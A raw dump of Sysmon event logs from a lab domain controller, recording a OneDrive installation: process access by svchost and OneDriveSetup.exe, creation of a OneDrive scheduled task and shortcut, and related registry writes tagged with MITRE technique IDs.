\FileSyncConfig.exe+1b2e 10341000x800000000000000079895Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.860{A7A01FEF-B626-607E-1600-00000000BB01}15401856C:\Windows\system32\svchost.exe{A7A01FEF-EC14-607E-4A0E-00000000BB01}4208C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079894Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.860{A7A01FEF-B626-607E-1600-00000000BB01}15401640C:\Windows\system32\svchost.exe{A7A01FEF-EC14-607E-4A0E-00000000BB01}4208C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileSyncConfig.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079893Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.774{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000079892Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.766{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x800000000000000079891Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10532021-04-20 14:58:28.745{A7A01FEF-B626-607E-1600-00000000BB01}1540C:\Windows\system32\svchost.exeC:\Windows\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-325169965-3944942172-2068406585-5002021-04-20 14:58:28.745 13241300x800000000000000079890Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:28.743{A7A01FEF-EBFF-607E-270E-00000000BB01}6624C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive7\(Default){C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} 13241300x800000000000000079889Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:28.743{A7A01FEF-EBFF-607E-270E-00000000BB01}6624C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive6\(Default){9AA2F32D-362A-42D9-9328-24A483E2CCC3} 13241300x800000000000000079888Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:28.743{A7A01FEF-EBFF-607E-270E-00000000BB01}6624C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive5\(Default){A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} 13241300x800000000000000079887Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:28.743{A7A01FEF-EBFF-607E-270E-00000000BB01}6624C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive4\(Default){F241C880-6982-4CE5-8CF7-7085BA96DA5A} 13241300x800000000000000079886Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:28.743{A7A01FEF-EBFF-607E-270E-00000000BB01}6624C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive3\(Default){A78ED123-AB77-406B-9962-2A5D9D2F7F30} 13241300x800000000000000079885Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:28.742{A7A01FEF-EBFF-607E-270E-00000000BB01}6624C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive2\(Default){5AB7172C-9C11-405C-8DD5-AF20F3606282} 13241300x800000000000000079884Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:28.742{A7A01FEF-EBFF-607E-270E-00000000BB01}6624C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ OneDrive1\(Default){BBACC218-34EA-4666-9D7A-C78F2274A524} 13241300x800000000000000079883Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:28.738{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe\UrlUpdateInfohttp://go.microsoft.com/fwlink/?LinkID=223554 13241300x800000000000000079882Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-SetValue2021-04-20 14:58:28.738{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe\UrlUpdateInfohttp://go.microsoft.com/fwlink/?LinkID=223554 13241300x800000000000000079881Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localInvDB-PubSetValue2021-04-20 14:58:28.738{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe\PublisherMicrosoft Corporation 10341000x800000000000000079880Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.737{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b21c(wow64)|C:\Windows\System32\windows.storage.dll+10adf5(wow64)|C:\Windows\System32\windows.storage.dll+10ac56(wow64)|C:\Windows\System32\windows.storage.dll+9b87e(wow64)|C:\Windows\System32\windows.storage.dll+9b6fb(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+ca460|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+ca82b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf8e3|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba 10341000x800000000000000079879Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.737{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b14f(wow64)|C:\Windows\System32\windows.storage.dll+10adf5(wow64)|C:\Windows\System32\windows.storage.dll+10ac56(wow64)|C:\Windows\System32\windows.storage.dll+9b87e(wow64)|C:\Windows\System32\windows.storage.dll+9b6fb(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+ca460|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+ca82b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf8e3|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba 10341000x800000000000000079878Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.737{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b13a(wow64)|C:\Windows\System32\windows.storage.dll+10adf5(wow64)|C:\Windows\System32\windows.storage.dll+10ac56(wow64)|C:\Windows\System32\windows.storage.dll+9b87e(wow64)|C:\Windows\System32\windows.storage.dll+9b6fb(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+ca460|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+ca82b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf8e3 10341000x800000000000000079877Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.737{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b13a(wow64)|C:\Windows\System32\windows.storage.dll+10adf5(wow64)|C:\Windows\System32\windows.storage.dll+10ac56(wow64)|C:\Windows\System32\windows.storage.dll+9b87e(wow64)|C:\Windows\System32\windows.storage.dll+9b6fb(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+ca460|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+ca82b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf8e3|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6 10341000x800000000000000079876Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.737{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b21c(wow64)|C:\Windows\System32\windows.storage.dll+10adf5(wow64)|C:\Windows\System32\windows.storage.dll+10ac56(wow64)|C:\Windows\System32\windows.storage.dll+9b86e(wow64)|C:\Windows\System32\windows.storage.dll+9b6fb(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+ca460|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+ca82b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf8e3|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba 10341000x800000000000000079875Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.737{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b14f(wow64)|C:\Windows\System32\windows.storage.dll+10adf5(wow64)|C:\Windows\System32\windows.storage.dll+10ac56(wow64)|C:\Windows\System32\windows.storage.dll+9b86e(wow64)|C:\Windows\System32\windows.storage.dll+9b6fb(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+ca460|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+ca82b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf8e3|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba 10341000x800000000000000079874Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.737{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b13a(wow64)|C:\Windows\System32\windows.storage.dll+10adf5(wow64)|C:\Windows\System32\windows.storage.dll+10ac56(wow64)|C:\Windows\System32\windows.storage.dll+9b86e(wow64)|C:\Windows\System32\windows.storage.dll+9b6fb(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+ca460|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+ca82b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf8e3 10341000x800000000000000079873Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.737{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b13a(wow64)|C:\Windows\System32\windows.storage.dll+10adf5(wow64)|C:\Windows\System32\windows.storage.dll+10ac56(wow64)|C:\Windows\System32\windows.storage.dll+9b86e(wow64)|C:\Windows\System32\windows.storage.dll+9b6fb(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+ca460|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+ca82b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf8e3|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6 10341000x800000000000000079872Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.736{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+2995e(wow64)|C:\Windows\System32\shcore.dll+29cab(wow64)|C:\Windows\System32\windows.storage.dll+1e3f2a(wow64)|C:\Windows\System32\windows.storage.dll+10ad68(wow64)|C:\Windows\System32\windows.storage.dll+9b86e(wow64)|C:\Windows\System32\windows.storage.dll+9b6fb(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+ca460|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+ca82b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf8e3|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e285b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+df7ba 10341000x800000000000000079871Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.736{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1e3f1c(wow64)|C:\Windows\System32\windows.storage.dll+10ad68(wow64)|C:\Windows\System32\windows.storage.dll+9b86e(wow64)|C:\Windows\System32\windows.storage.dll+9b6fb(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+ca460|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+ca82b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf8e3|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6 10341000x800000000000000079870Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:28.736{A7A01FEF-EBFF-607E-2A0E-00000000BB01}33847136C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe{A7A01FEF-C0A6-607E-8105-00000000BB01}836C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c69b8(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1e3f1c(wow64)|C:\Windows\System32\windows.storage.dll+10ad68(wow64)|C:\Windows\System32\windows.storage.dll+9b86e(wow64)|C:\Windows\System32\windows.storage.dll+9b6fb(wow64)|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+ca460|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+ca82b|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+cf8e3|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+de6e6|C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exe+e6a52 11241100x800000000000000079869Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT10232021-04-20 14:58:28.731{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk2021-04-20 14:58:28.730 13241300x800000000000000079868Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:58:28.684{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\odopen\shell\open\command\(Default)"C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /url:"%%1" 13241300x800000000000000079867Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:58:28.684{A7A01FEF-EBFF-607E-2A0E-00000000BB01}3384C:\Program Files\Microsoft Office\root\integration\Addons\OneDriveSetup.exeHKU\S-1-5-21-325169965-3944942172-2068406585-500_Classes\odopen\shell\open\command\(Default)"C:\Users\Administrator\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /url:"%%1" 